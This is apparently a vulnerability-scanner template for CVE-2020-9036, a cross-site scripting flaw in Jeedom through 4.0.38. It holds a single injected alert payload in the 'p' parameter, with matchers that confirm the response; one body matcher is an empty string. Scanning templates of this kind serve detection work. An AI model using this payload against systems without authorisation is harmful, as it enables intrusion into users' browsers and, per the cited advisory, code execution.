id: CVE-2020-9036 info: name: Jeedom through 4.0.38 allows XSS author: pikpikcu severity: medium reference: - https://sysdream.com/news/lab/2020-08-05-cve-2020-9036-jeedom-xss-leading-to-remote-code-execution/ - https://nvd.nist.gov/vuln/detail/CVE-2020-9036 tags: cve,cve2020,xss,jeedom requests: - method: GET path: - "{{BaseURL}}/index.php?v=d&p=%22;alert(document.domain);%22" matchers-condition: and matchers: - type: word words: - '' part: body - type: status status: - 200 - type: word part: header words: - text/html